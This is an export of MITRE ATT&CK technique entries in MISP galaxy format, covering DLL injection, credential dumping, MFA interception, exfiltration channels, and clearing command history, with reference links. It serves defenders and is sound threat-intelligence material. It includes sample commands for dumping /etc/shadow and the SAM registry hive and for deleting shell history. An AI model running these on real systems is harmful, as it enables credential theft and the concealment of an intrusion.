https://attack.mitre.org/techniques/T1373

Dynamic-link Library Injection - T1055.001

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the need for additional APIs to invoke execution (since these methods load and execute the files in memory by manually performing the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module’s <code>AddressOfEntryPoint</code> before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"

Table 5627. Table References

Links

https://attack.mitre.org/techniques/T1055/001

https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/

https://www.endgame.com/blog/technical-blog/hunting-memory

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection

Exploit Public-Facing Application - T1190

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190"

Table 5628. Table References

Links

https://attack.mitre.org/techniques/T1190

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://cwe.mitre.org/top25/index.html

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/

Untargeted client-side exploitation - T1370

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on a widely used public web site, intended for drive-by delivery to whoever visits the site. (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Untargeted client-side exploitation - T1370"

Table 5629. Table References

Links

https://attack.mitre.org/techniques/T1370

Non-Application Layer Protocol - T1095

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"

Table 5630. Table References

Links

http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29

http://support.microsoft.com/KB/170292

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1095

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Multi-Factor Authentication Interception - T1111

Adversaries may target multi-factor authentication (MFA) mechanisms (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user’s personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Interception - T1111"

Table 5631. Table References

Links

https://attack.mitre.org/techniques/T1111

https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf

https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/

https://sec.okta.com/scatterswine

Host-based hiding techniques - T1314

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).

Host-based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weaknesses in file formats or parsers, or self-deleting code. (Citation: VirutAP)

The tag is: misp-galaxy:mitre-attack-pattern="Host-based hiding techniques - T1314"

Table 5632. Table References

Links

https://attack.mitre.org/techniques/T1314

Network-based hiding techniques - T1315

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1315).

Technical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="Network-based hiding techniques - T1315"

Table 5633. Table References

Links

https://attack.mitre.org/techniques/T1315

Targeted client-side exploitation - T1371

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user’s computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted client-side exploitation - T1371"

Table 5634. Table References

Links

https://attack.mitre.org/techniques/T1371

Insecure Third-Party Libraries - T1425

Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities.

For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Insecure Third-Party Libraries - T1425"

Insecure Third-Party Libraries - T1425 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5635. Table References

Links

https://attack.mitre.org/techniques/T1425

Exploit public-facing application - T1377

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).

The use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit public-facing application - T1377"

Table 5636. Table References

Links

https://attack.mitre.org/techniques/T1377

Search Victim-Owned Websites - T1594

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594"

Table 5637. Table References

Links

https://attack.mitre.org/techniques/T1594

https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/

/etc/passwd and /etc/shadow - T1003.008

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

The Linux utility unshadow can be used to combine the two files into a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>

The tag is: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008"

Table 5638. Table References

Links

https://attack.mitre.org/techniques/T1003/008

https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html

SMB/Windows Admin Shares - T1021.002

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)

The tag is: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002"

Table 5639. Table References

Links

http://support.microsoft.com/kb/314984

https://attack.mitre.org/techniques/T1021/002

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

https://en.wikipedia.org/wiki/Server_Message_Block

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/library/cc787851.aspx

Disguise Root/Jailbreak Indicators - T1630.003

An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)

The tag is: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1630.003"

Table 5640. Table References

Links

http://pages.cs.wisc.edu/vrastogi/static/papers/rcj13b.pdf

http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions

https://attack.mitre.org/techniques/T1630/003

https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html

Reduce Key Space - T1600.001

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Reduce Key Space - T1600.001"

Table 5641. Table References

Links

https://attack.mitre.org/techniques/T1600/001

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Security Account Manager - T1003.002

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • <code>reg save HKLM\sam sam</code>

  • <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.

  • RID 501 is the guest account.

  • User accounts start with a RID of 1,000+.

The tag is: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002"

Table 5642. Table References

Links

https://attack.mitre.org/techniques/T1003/002

https://github.com/Neohapsis/creddump7

Disable Crypto Hardware - T1600.002

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Disable Crypto Hardware - T1600.002"

Table 5643. Table References

Links

https://attack.mitre.org/techniques/T1600/002

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Cached Domain Credentials - T1003.005

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)

On Windows Vista and newer, the hash format is the DCC2 (Domain Cached Credentials version 2) hash, also known as the MS-Cache v2 hash.(Citation: PassLib mscache) The number of cached credentials kept by default varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)

With SYSTEM access, tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

The tag is: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005"

Table 5644. Table References

Links

https://attack.mitre.org/techniques/T1003/005

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)

https://github.com/mattifestation/PowerSploit

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html

Clear Command History - T1070.003

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or by deleting the bash history file (<code>rm ~/.bash_history</code>).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003"

Table 5645. Table References

Links

https://attack.mitre.org/techniques/T1070/003

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

https://www.us-cert.gov/ncas/alerts/TA18-106A

Clear Mailbox Data - T1070.008

Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Mailbox Data - T1070.008"

Table 5646. Table References

Links

https://attack.mitre.org/techniques/T1070/008

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes

https://man7.org/linux/man-pages/man1/mailx.1p.html

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Exfiltration Over Bluetooth - T1011.001

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001"

Table 5647. Table References

Links

https://attack.mitre.org/techniques/T1011/001

Dead Drop Resolver - T1102.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"

Table 5648. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/001

Remote Desktop Protocol - T1021.001

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"

Table 5649. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

https://attack.mitre.org/techniques/T1021/001

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Internet Connection Discovery - T1016.001

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

The tag is: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001"

Table 5650. Table References

Links

https://attack.mitre.org/techniques/T1016/001

Patch System Image - T1601.001

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001"

Table 5651. Table References

Links

http://2015.zeronights.org/assets/files/05-Nosenko.pdf

https://attack.mitre.org/techniques/T1601/001

https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf

https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf

https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf

Exfiltration over USB - T1052.001

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"

Table 5652. Table References

Links

https://attack.mitre.org/techniques/T1052/001

Downgrade System Image - T1601.002

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older version may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002"

Table 5653. Table References

Links

https://attack.mitre.org/techniques/T1601/002

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Windows Remote Management - T1021.006

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

